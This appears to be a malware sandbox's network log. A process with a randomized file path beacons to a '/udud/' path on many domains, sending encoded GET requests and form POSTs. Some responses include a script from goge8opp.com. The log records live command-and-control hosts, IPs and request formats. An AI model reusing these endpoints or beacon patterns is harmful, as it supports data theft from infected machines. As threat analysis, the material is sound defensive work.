                                                                                                May 27, 2024 12:36:56.923016071 CEST  477  OUT  GET /udud/?pzH0=GNw0Cp4PdpF&Pl9P8ldX=NYPylna2Z9eGKk0n2zL98jmopuuDXUwTW1hg/NJ4dH1aG6U36Zymeq8Q+jA5ULsRtwMU5Sxc1U1KJPrtknew8LZ9GrpjSEZ/84zq63NvruY/sq3UYTRA7EE= HTTP/1.1
                                                                                                Host: www.wp-bits.online
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:36:57.118632078 CEST  359  IN  HTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:36:57 GMT
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Content-Length: 196
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                82  192.168.11.30  49912  185.215.4.19  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                May 27, 2024 12:37:02.912525892 CEST  748  OUT  POST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:37:03.197293997 CEST  751  IN  HTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=zPvOw6oaeNZcJ75G881l; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:02 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                83  192.168.11.30  49913  185.215.4.19  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                May 27, 2024 12:37:05.560663939 CEST  768  OUT  POST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:37:05.831618071 CEST  751  IN  HTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=K5CgOExyh7s2WfkrXWiR; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:05 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                84  192.168.11.30  49914  185.215.4.19  80  7584  C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                                May 27, 2024 12:37:08.216242075 CEST  1685  OUT  POST /udud/ HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.academynadpo.ru
                                                                                                Referer: http://www.academynadpo.ru/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:37:08.470360041 CEST  751  IN  HTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=OodH06pAccMziIHJU52H; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:08 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 340
                                                                                                Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                ETag: "154-56d5bbe607fc0"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.11.30 | 49915 | 185.215.4.19 | 80 | 7584 | C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:10.871109009 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=lxKI396dcfUopLOCgIwHig2W2DxUvRX97MJRzioDZqj6Mq9AZ90i2wJz7BzjxOGPWVxSz39xtFFcwgb3QegZat7wpytzNwJDmdPz0ImKOxyDMBvGUlbFyek=&pzH0=GNw0Cp4PdpF HTTP/1.1
                                                                                                Host: www.academynadpo.ru
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:37:11.128859997 CEST | 1149 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: ddos-guard
                                                                                                Connection: close
                                                                                                Set-Cookie: __ddg1_=LQ7ncvyPuVQcyFyOew5a; Domain=.academynadpo.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:37:10 GMT
                                                                                                Date: Mon, 27 May 2024 10:37:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Content-Length: 738
                                                                                                Last-Modified: Sun, 11 Jun 2023 21:19:31 GMT
                                                                                                ETag: "2e2-5fde1286ba692"
                                                                                                Accept-Ranges: bytes
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
86 | 192.168.11.30 | 49916 | 162.209.189.152 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:24.622390032 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
87 | 192.168.11.30 | 49917 | 162.209.189.152 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:27.314883947 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
88 | 192.168.11.30 | 49918 | 162.209.189.152 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:29.994443893 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
89 | 192.168.11.30 | 49919 | 162.209.189.152 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:32.682533979 CEST | 192 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 96
                                                                                                Cache-Control: max-age=2592000
                                                                                                Data Ascii: <html><body><script src="http://goge8opp.com:301" type="text/javascript"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
90 | 192.168.11.30 | 49924 | 208.112.85.150 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:37:56.573240995 CEST | 481 | OUT | GET /udud/?Pl9P8ldX=FIraThNO5niOHukbO1r8qSNysm+mJ2OOQaLhh3AktbepBJXcjCIQ5u+D5oIg7MUCVA/ZghdlXch7ulyeg4ZZkVaM25CfsdbY6Ciec8CSMOWGBD2e85VJ6eo=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.fivetownsjcc.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:37:56.689846992 CEST | 383 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:37:36 GMT
                                                                                                Server: Apache
                                                                                                X-SERVER: 3908
                                                                                                Content-Length: 203
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
91 | 192.168.11.30 | 49925 | 79.98.25.1 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:01.911180019 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=+7vgIBjJEgFzVABnblxNZlxcXvtVnPO976cESSRxKNf7HePF9jiwkaXwYbYPT+M2gd9LCxRObe8L7kEVgXr7yG5qgAvgbam/iSwlpjMS4ArI2Mt4ChGP5d0=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.maxiwalls.com
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:02.120111942 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                Date: Mon, 27 May 2024 10:38:01 GMT
                                                                                                Server: Apache
                                                                                                Cache-control: max-age=300
                                                                                                Vary: Accept-Encoding
                                                                                                Content-Length: 5662
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=2 [TRUNCATED]
May 27, 2024 12:38:02.120234013 CEST | 1289 | IN
                                                                                                Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
May 27, 2024 12:38:02.120347023 CEST | 1289 | IN
                                                                                                Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
May 27, 2024 12:38:02.120471954 CEST | 1289 | IN
                                                                                                Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
May 27, 2024 12:38:02.120626926 CEST | 710 | IN
                                                                                                Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


Session ID | Source IP | Source Port | Destination IP | Destination Port
92 | 192.168.11.30 | 49926 | 64.190.62.22 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:07.328663111 CEST | 486 | OUT | GET /udud/?Pl9P8ldX=TI4e2mgRGjDzVtc2Q6Py5bwpcc1eb12gZ0duId/eBRBY8c2YNmrJo+kJDCAf1WNWS12prRY8Wfa6UPEwF5qWDHqXkvXCbknW9nAX9azEcXWIpZdV+y5+rBk=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.donantedeovulos.space
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:07.555200100 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:38:07 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==
                                                                                                last-modified: Mon, 27 May 2024 10:38:07 GMT
                                                                                                x-cache-miss-from: parking-54698f55d6-q2vkw
                                                                                                server: NginX
                                                                                                connection: close
                                                                                                Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_bZQwM6rcoDWKKpVAXhX2tlV84V3PyO17BuINdDXE3PQlpZg9Kg6Hnhi5jqSBqYmWFVUdTNJQtasOr6lulaA+uQ==><head><meta charset="utf-8"><title>donantedeovulos.space&nbsp;-&nbsp;donantedeovulos Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="donantedeovulos.space is your first and best source for all of the information youre looki
May 27, 2024 12:38:07.555274010 CEST | 1289 | IN
                                                                                                Data Ascii: ng for. From general topics to more of what you would expect to find here, donantedeovulos.space has it1062 all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparkin
May 27, 2024 12:38:07.555304050 CEST | 1289 | IN
                                                                                                Data Ascii: root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-w
May 27, 2024 12:38:07.555393934 CEST | 1289 | IN
                                                                                                Data Ascii: nnouncement{background:#273948;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text
May 27, 2024 12:38:07.555531979 CEST | 1289 | IN
                                                                                                Data Ascii: print__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-li
                                                                                                May 27, 2024 12:38:07.555627108 CEST1289INData Raw: 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77
                                                                                                Data Ascii: ;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-bloc
                                                                                                May 27, 2024 12:38:07.555689096 CEST672INData Raw: 63 38 33 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 37 32 37 63 38 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                Data Ascii: c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:init
                                                                                                May 27, 2024 12:38:07.555788994 CEST1289INData Raw: 31 35 44 38 0d 0a 2d 2d 72 6f 75 6e 64 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 34 70 78 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 2d 2d 72 6f 75 6e 64 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 69
                                                                                                Data Ascii: 15D8--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}input:focus+.switch__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transfo
                                                                                                May 27, 2024 12:38:07.555815935 CEST1289INData Raw: 6e 64 65 78 3a 2d 31 3b 74 6f 70 3a 2d 33 30 30 70 78 3b 6c 65 66 74 3a 2d 35 30 70 78 3b 68 65 69 67 68 74 3a 31 33 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72
                                                                                                Data Ascii: ndex:-1;top:-300px;left:-50px;height:1300px;position:inherit}.container-content__right{background:url("//img.sedoparking.com/templates/bg/multi-arrows.png") #273948 no-repeat center top;background-size:95% 2940px;flex-grow:2;-moz-transform:sca
                                                                                                May 27, 2024 12:38:07.555875063 CEST1289INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65
                                                                                                Data Ascii: ont-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9
                                                                                                May 27, 2024 12:38:07.745125055 CEST1289INData Raw: 6e 63 79 22 3a 22 22 2c 22 61 64 75 6c 74 46 6c 61 67 22 3a 66 61 6c 73 65 2c 22 70 75 22 3a 22 2f 2f 77 77 77 2e 64 6f 6e 61 6e 74 65 64 65 6f 76 75 6c 6f 73 2e 73 70 61 63 65 22 2c 22 64 6e 73 68 22 3a 74 72 75 65 2c 22 64 70 73 68 22 3a 66 61
                                                                                                Data Ascii: ncy":"","adultFlag":false,"pu":"//www.donantedeovulos.space","dnsh":true,"dpsh":false,"toSell":false,"cdnHost":"img.sedoparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RX


Session ID | Source IP | Source Port | Destination IP | Destination Port
93 | 192.168.11.30 | 49927 | 3.73.27.108 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:12.948900938 CEST | 485 | OUT | GET /udud/?Pl9P8ldX=hGFabcFIFCLvltCtmr9HP7OROVYI8jz1wRRIKEqq2n4QXlxpqgeqG0CRvdN+pVKSvdVheptlxRG17ghg7M8WhiuOrvxilzcVqEvqLqvxpfLmNTwCuTHyXsI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.valentinaetommaso.it
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:13.184134007 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:38:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Set-Cookie: PHPSESSID=1vdklb6ta12o9p8t3rtq5b1n4n; path=/; domain=valentinaetommaso.it; HttpOnly
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port
94 | 192.168.11.30 | 49928 | 203.161.49.193 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:23.904166937 CEST | 478 | OUT | GET /udud/?Pl9P8ldX=PsObB6+xPBRyZVNIbCvU2WSZgkCw8khE9p6p1fw7XNSxe8fb3H1JBnahW35XlkcpsNyADYDExmr6dQQdFworvtXhDNQSnK6hOqfzO1lUJ+gi+DatEY0x4VA=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.funtechie.top
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:24.080528021 CEST | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                Date: Mon, 27 May 2024 10:38:23 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
95 | 192.168.11.30 | 49929 | 91.195.240.123 | 80
Timestamp | Bytes transferred | Direction | Data
May 27, 2024 12:38:29.292431116 CEST | 473 | OUT | GET /udud/?Pl9P8ldX=pl+m+RwhDilgNhV8y9np651oviBSsBUAcSsMU8DJXuQO/zLKreqMvauOXyOp2DyQLR+zvzGH9k4G3Xo0zK83IFFyM0D1vpL10/nbh1uWm09odGxnF4xzrfg=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.l7aeh.us
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
May 27, 2024 12:38:29.519675016 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                date: Mon, 27 May 2024 10:38:29 GMT
                                                                                                content-type: text/html; charset=UTF-8
                                                                                                transfer-encoding: chunked
                                                                                                vary: Accept-Encoding
                                                                                                x-powered-by: PHP/8.1.17
                                                                                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                pragma: no-cache
                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_vZfSQlyoenW7FiQW009uFuaKcMnNFrDJ7SyVW/QTWmDFE2E7HNPzl1TA/mmwxM4mQpueHXtyaevKk2mklSVILg==
                                                                                                last-modified: Mon, 27 May 2024 10:38:29 GMT
                                                                                                x-cache-miss-from: parking-6cfd44ff49-s62jt
                                                                                                server: NginX
                                                                                                connection: close
